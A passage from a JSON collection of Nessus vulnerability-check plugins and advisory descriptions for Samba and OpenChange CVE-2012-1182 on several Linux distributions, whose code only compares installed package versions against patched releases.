audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"libsmbclient-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libsmbclient-devel-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-common-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-common-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-clients-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:55:35", "description": "A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler. As OpenChange uses code generated by PIDL, this could have resulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version of PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which provides a number of bug fixes and enhancements over the previous version, including support for the rebased samba4 packages and several API changes.\n\nThis update also fixes the following bugs :\n\n - When the user tried to modify a meeting with one required attendee and himself as the organizer, a segmentation fault occurred in the memcpy() function.\n Consequently, the evolution-data-server application terminated unexpectedly with a segmentation fault. This bug has been fixed and evolution- data-server no longer crashes in the described scenario.\n\n - Prior to this update, OpenChange 1.0 was unable to send messages with a large message body or with extensive attachment. This was caused by minor issues in OpenChange's exchange.idl definitions. This bug has been fixed and OpenChange now sends extensive messages without complications.", "cvss3": {"score": null, "vector": null}, "published": "2013-03-05T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : openchange on SL6.x i386/x86_64 (20130221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:evolution-mapi", "p-cpe:/a:fermilab:scientific_linux:evolution-mapi-debuginfo", "p-cpe:/a:fermilab:scientific_linux:evolution-mapi-devel", "p-cpe:/a:fermilab:scientific_linux:openchange", "p-cpe:/a:fermilab:scientific_linux:openchange-client", "p-cpe:/a:fermilab:scientific_linux:openchange-debuginfo", "p-cpe:/a:fermilab:scientific_linux:openchange-devel", "p-cpe:/a:fermilab:scientific_linux:openchange-devel-docs", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20130221_OPENCHANGE_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/65013", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65013);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Scientific Linux Security Update : openchange on SL6.x i386/x86_64 (20130221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version\nof PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version, including support for the rebased samba4 packages\nand several API changes.\n\nThis update also fixes the following bugs :\n\n - When the user tried to modify a meeting with one\n required attendee and himself as the organizer, a\n segmentation fault occurred in the memcpy() function.\n Consequently, the evolution-data-server application\n terminated unexpectedly with a segmentation fault. This\n bug has been fixed and evolution- data-server no longer\n crashes in the described scenario.\n\n - Prior to this update, OpenChange 1.0 was unable to send\n messages with a large message body or with extensive\n attachment. This was caused by minor issues in\n OpenChange's exchange.idl definitions. This bug has been\n fixed and OpenChange now sends extensive messages\n without complications.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1303&L=scientific-linux-errata&T=0&P=331\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0f0aa04e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:evolution-mapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:evolution-mapi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:evolution-mapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openchange\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openchange-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openchange-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openchange-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openchange-devel-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"evolution-mapi-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"evolution-mapi-debuginfo-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"evolution-mapi-devel-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openchange-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openchange-client-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openchange-debuginfo-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openchange-devel-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openchange-devel-docs-1.0-4.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"evolution-mapi / evolution-mapi-debuginfo / evolution-mapi-devel / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:54:15", "description": "From Red Hat Security Advisory 2012:0465 :\n\nUpdated samba packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3 Long Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 5 / 6 : samba (ELSA-2012-0465)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:libsmbclient", "p-cpe:/a:oracle:linux:libsmbclient-devel", "p-cpe:/a:oracle:linux:samba", "p-cpe:/a:oracle:linux:samba-client", "p-cpe:/a:oracle:linux:samba-common", "p-cpe:/a:oracle:linux:samba-doc", "p-cpe:/a:oracle:linux:samba-domainjoin-gui", "p-cpe:/a:oracle:linux:samba-swat", "p-cpe:/a:oracle:linux:samba-winbind", "p-cpe:/a:oracle:linux:samba-winbind-clients", "p-cpe:/a:oracle:linux:samba-winbind-devel", "p-cpe:/a:oracle:linux:samba-winbind-krb5-locator", "cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2012-0465.NASL", "href": "https://www.tenable.com/plugins/nessus/68506", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0465 and \n# Oracle Linux Security Advisory ELSA-2012-0465 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68506);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2012:0465\");\n\n script_name(english:\"Oracle Linux 5 / 6 : samba (ELSA-2012-0465)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0465 :\n\nUpdated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-April/002736.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-April/002740.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"libsmbclient-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"libsmbclient-devel-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba-common-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"libsmbclient-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libsmbclient-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-common-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-clients-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:56:03", "description": "Updated openchange packages that fix one security issue, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange servers using native protocols. Evolution-MAPI uses these libraries to integrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler. As OpenChange uses code generated by PIDL, this could have resulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version of PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which provides a number of bug fixes and enhancements over the previous version, including support for the rebased samba4 packages and several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee and himself as the organizer, a segmentation fault occurred in the memcpy() function. Consequently, the evolution-data-server application terminated unexpectedly with a segmentation fault. This bug has been fixed and evolution-data-server no longer crashes in the described scenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with a large message body or with extensive attachment. This was caused by minor issues in OpenChange's exchange.idl definitions. This bug has been fixed and OpenChange now sends extensive messages without complications. (BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages, which fix these issues and add these enhancements.", "cvss3": {"score": null, "vector": null}, "published": "2013-02-21T00:00:00", "type": "nessus", "title": "RHEL 6 : openchange (RHSA-2013:0515)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:evolution-mapi", "p-cpe:/a:redhat:enterprise_linux:evolution-mapi-debuginfo", "p-cpe:/a:redhat:enterprise_linux:evolution-mapi-devel", "p-cpe:/a:redhat:enterprise_linux:openchange", "p-cpe:/a:redhat:enterprise_linux:openchange-client", "p-cpe:/a:redhat:enterprise_linux:openchange-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openchange-devel", "p-cpe:/a:redhat:enterprise_linux:openchange-devel-docs", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2013-0515.NASL", "href": "https://www.tenable.com/plugins/nessus/64763", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0515. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64763);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0515\");\n\n script_name(english:\"RHEL 6 : openchange (RHSA-2013:0515)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openchange packages that fix one security issue, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange\nservers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version\nof PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version, including support for the rebased samba4 packages\nand several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee\nand himself as the organizer, a segmentation fault occurred in the\nmemcpy() function. Consequently, the evolution-data-server application\nterminated unexpectedly with a segmentation fault. This bug has been\nfixed and evolution-data-server no longer crashes in the described\nscenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages\nwith a large message body or with extensive attachment. This was\ncaused by minor issues in OpenChange's exchange.idl definitions. This\nbug has been fixed and OpenChange now sends extensive messages without\ncomplications. (BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated\npackages, which fix these issues and add these enhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1182\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:evolution-mapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:evolution-mapi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:evolution-mapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openchange\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openchange-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openchange-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openchange-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openchange-devel-docs\");\n script_set_attribute(attribute:\"cpe\", 